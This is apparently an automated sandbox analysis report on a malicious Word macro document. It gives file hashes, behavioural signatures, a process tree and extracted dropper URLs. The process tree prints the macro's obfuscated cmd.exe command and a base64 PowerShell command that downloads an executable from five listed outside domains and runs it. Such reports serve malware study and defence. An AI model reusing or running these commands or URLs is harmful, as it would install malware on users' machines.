Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    147s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/06/2024, 07:55

General

  • Target

    9d7cb858c95dc395c70d35c16ca21251_JaffaCakes118.doc

  • Size

    89KB

  • MD5

    9d7cb858c95dc395c70d35c16ca21251

  • SHA1

    106036d522d5f722ae5508d358b5e918558e7511

  • SHA256

    29390b9ee891dbeac9519a65a1eaf199a398a502076599e5ced5c7856f1574a7

  • SHA512

    06fe9cfc1b1e476f0d458f0bb0a7b9d11bf08b5b41d8798feb9e16c8863f6eb4464c3028f50afff19281d22e46b47e715e5183cc9c15b936a7c0bcaa830247c6

  • SSDEEP

    1536:JptJlmrJpmxlRw99NBO+aAXIrlnKchqXN076KC0It4oC:3te2dw99fZ2vR1It4

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://aliu-rdc.org/QwWKYJxM

exe.dropper

http://2idiotsandnobusinessplan.com/wC7

exe.dropper

http://7naturalessences.com/DFaSvtrS

exe.dropper

http://benimdunyamkres.com/v0vig1G1

exe.dropper

http://hostmktar.com/mP

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9d7cb858c95dc395c70d35c16ca21251_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:812
    • C:\Windows\SYSTEM32\CMd.exe
      CMd /v/r " ^sE^T ^ ^h^q^x==^=^A^Ag^AA^I^AACA^g^AA^IAAC^A^g^AAIAAC^A^gA^A^I^A^ACAg^AA^I^AACAgA^AI^A^0^H^A9Bw^e^Ag^G^AjBA^dAEGA^jBQf^As^D^ArB^QYA^UG^Ay^B^g^Y^As^D^A^O^B^wQ^A^Y^E^A^k^AAI^A0GA^lB^A^d^A^k^EAt^AQZ^AsGAvB^g^d^A^4G^AJ^Bw^OA^kC^AOBw^QAYEA^kAA^IAwCATB^Aa^AY^E^A^k^AAK^AUG^A^s^B^QaAYE^AkBQ^YA8^G^As^BgbAcHAv^B^AR^A^4C^A^y^BQ^Q^A^o^G^AkAweA^kH^A^y^B^A^dA^s^HAp^A^gT^A8^GA^GB^AJA^ACA^uBQ^a^A^ACATBAa^AYE^A^k^A^A^KAgG^A^jB^QYA^UG^AyBwbAY^GA^7^A^wJA^U^G^A4^B^QZA^4CAn^AwKAYGA2^B^A^U^A^QC^ArAwJ^Aw^FAn^A^wK^A^M^GA^pBA^b^A^I^G^A1B^AcAoD^A^2^Bg^b^A^U^GA^kAQPA4E^AD^B^gR^AQCA^7Aw^J^A^ADA^x^A^wN^AcCA^g^A^Q^P^A^ACAmBg^dAA^F^A^k^AwO^A^kC^AnAA^QAcCAoA^Ad^AkG^A^sBAc^AMFA^u^Aw^JAAF^A^t^B^wL^A0GAv^Bw^YA^4CAyBQ^YAQHAr^B^Q^bA^Q^HAzB^w^bAg^GAvAw^LA^o^DA^w^B^AdA^QHA^o^BAQAED^A^HBQM^AcGAp^Bgd^A^A^DA2^BwL^A0^GAvB^w^Y^A4C^AzBQZ^AI^HArB^Q^bA^EGA^5B^g^b^A^UH^Ak^BQb^Ak^GAuBQ^ZA^I^G^Av^AwL^A^oD^A^w^BAdA^Q^H^A^o^BAQ^A^MF^AyB^A^dA^YH^ATBQY^A^YE^AE^B^wLA^0^G^AvBw^Y^A^4C^Az^BQ^ZAMGAu^B^Q^Z^AMH^AzB^Q^ZAw^G^A^h^Bgc^A^UH^A0B^QYA4^GA^3Aw^L^A8CA6A^Ac^AQ^H^A0^B^A^a^AA^E^A3^A^wQ^AcH^AvAQ^b^A^8^G^A^j^B^g^LA4^G^AhBAb^AA^H^A^z^B^wc^A^U^GA^uB^Qa^A^MHA1B^g^YA^8G^A^uBA^ZA4G^Ah^B^wc^A^QHAvB^Qa^AQ^GA^p^B^g^M^A^8CAv^A^g^O^AAHA0BA^d^A^gG^A^ABQ^T^AgHA^KB^QW^A^sEAX^Bwd^A^EF^Av^A^wZ^A^I^H^AvB^g^LAM^GA^k^BgcA0C^A1B^Q^a^A^wG^A^h^B^w^L^A^8C^A^6^AAcA^QHA^0^BA^a^AcCA9^A^g^T^A^8^G^AG^B^A^J^AsD^A^0BgbA^U^G^Ap^BAb^AM^EAi^BQ^Z^AcFAu^A^AdAU^GA^O^BAIA^QH^A^j^BQZ^A^o^GAi^B^w^bA^0C^A^3BQZA^4^GA^9A^gc^AEEAqB^AJ ^e- ^l^le^h^sr^ewop& ^F^Or /^l %^Y ^In (^ ^9^8^9^ ^ ^ ^-^1 ^0)D^O ^s^E^t u^j^L^a=!u^j^L^a!!^h^q^x:~%^Y, 1!&^iF %^Y == ^0 CA^L^L %u^j^L^a:~^-^99^0% "
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:2148
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e JABqAEEAcgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABGAG8ATgA9ACcAaAB0AHQAcAA6AC8ALwBhAGwAaQB1AC0AcgBkAGMALgBvAHIAZwAvAFEAdwBXAEsAWQBKAHgATQBAAGgAdAB0AHAAOgAvAC8AMgBpAGQAaQBvAHQAcwBhAG4AZABuAG8AYgB1AHMAaQBuAGUAcwBzAHAAbABhAG4ALgBjAG8AbQAvAHcAQwA3AEAAaAB0AHQAcAA6AC8ALwA3AG4AYQB0AHUAcgBhAGwAZQBzAHMAZQBuAGMAZQBzAC4AYwBvAG0ALwBEAEYAYQBTAHYAdAByAFMAQABoAHQAdABwADoALwAvAGIAZQBuAGkAbQBkAHUAbgB5AGEAbQBrAHIAZQBzAC4AYwBvAG0ALwB2ADAAdgBpAGcAMQBHADEAQABoAHQAdABwADoALwAvAGgAbwBzAHQAbQBrAHQAYQByAC4AYwBvAG0ALwBtAFAAJwAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAFAAdgBmACAAPQAgACcANwAxADAAJwA7ACQARgBDAE4APQAkAGUAbgB2ADoAcAB1AGIAbABpAGMAKwAnAFwAJwArACQAUAB2AGYAKwAnAC4AZQB4AGUAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEYAaABTACAAaQBuACAAJABGAG8ATgApAHsAdAByAHkAewAkAGoAQQByAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAEYAaABTACwAIAAkAEYAQwBOACkAOwBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAEYAQwBOADsAYgByAGUAYQBrADsAfQBjAGEAdABjAGgAewB9AH0AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1716

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o0vmod4f.yvd.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/812-21-0x00007FFA932D0000-0x00007FFA934C5000-memory.dmp

    Filesize

    2.0MB

  • memory/812-64-0x00007FFA53350000-0x00007FFA53360000-memory.dmp

    Filesize

    64KB

  • memory/812-4-0x00007FFA932D0000-0x00007FFA934C5000-memory.dmp

    Filesize

    2.0MB

  • memory/812-6-0x00007FFA53350000-0x00007FFA53360000-memory.dmp

    Filesize

    64KB

  • memory/812-5-0x00007FFA53350000-0x00007FFA53360000-memory.dmp

    Filesize

    64KB

  • memory/812-1-0x00007FFA53350000-0x00007FFA53360000-memory.dmp

    Filesize

    64KB

  • memory/812-7-0x00007FFA932D0000-0x00007FFA934C5000-memory.dmp

    Filesize

    2.0MB

  • memory/812-11-0x00007FFA932D0000-0x00007FFA934C5000-memory.dmp

    Filesize

    2.0MB

  • memory/812-10-0x00007FFA932D0000-0x00007FFA934C5000-memory.dmp

    Filesize

    2.0MB

  • memory/812-12-0x00007FFA509F0000-0x00007FFA50A00000-memory.dmp

    Filesize

    64KB

  • memory/812-9-0x00007FFA932D0000-0x00007FFA934C5000-memory.dmp

    Filesize

    2.0MB

  • memory/812-20-0x00007FFA932D0000-0x00007FFA934C5000-memory.dmp

    Filesize

    2.0MB

  • memory/812-2-0x00007FFA53350000-0x00007FFA53360000-memory.dmp

    Filesize

    64KB

  • memory/812-13-0x00007FFA509F0000-0x00007FFA50A00000-memory.dmp

    Filesize

    64KB

  • memory/812-8-0x00007FFA932D0000-0x00007FFA934C5000-memory.dmp

    Filesize

    2.0MB

  • memory/812-22-0x00007FFA932D0000-0x00007FFA934C5000-memory.dmp

    Filesize

    2.0MB

  • memory/812-3-0x00007FFA9336D000-0x00007FFA9336E000-memory.dmp

    Filesize

    4KB

  • memory/812-67-0x00007FFA932D0000-0x00007FFA934C5000-memory.dmp

    Filesize

    2.0MB

  • memory/812-40-0x00007FFA932D0000-0x00007FFA934C5000-memory.dmp

    Filesize

    2.0MB

  • memory/812-41-0x00007FFA932D0000-0x00007FFA934C5000-memory.dmp

    Filesize

    2.0MB

  • memory/812-42-0x00007FFA932D0000-0x00007FFA934C5000-memory.dmp

    Filesize

    2.0MB

  • memory/812-43-0x00007FFA932D0000-0x00007FFA934C5000-memory.dmp

    Filesize

    2.0MB

  • memory/812-66-0x00007FFA53350000-0x00007FFA53360000-memory.dmp

    Filesize

    64KB

  • memory/812-65-0x00007FFA53350000-0x00007FFA53360000-memory.dmp

    Filesize

    64KB

  • memory/812-0-0x00007FFA53350000-0x00007FFA53360000-memory.dmp

    Filesize

    64KB

  • memory/812-63-0x00007FFA53350000-0x00007FFA53360000-memory.dmp

    Filesize

    64KB

  • memory/1716-32-0x0000018FBD940000-0x0000018FBD962000-memory.dmp

    Filesize

    136KB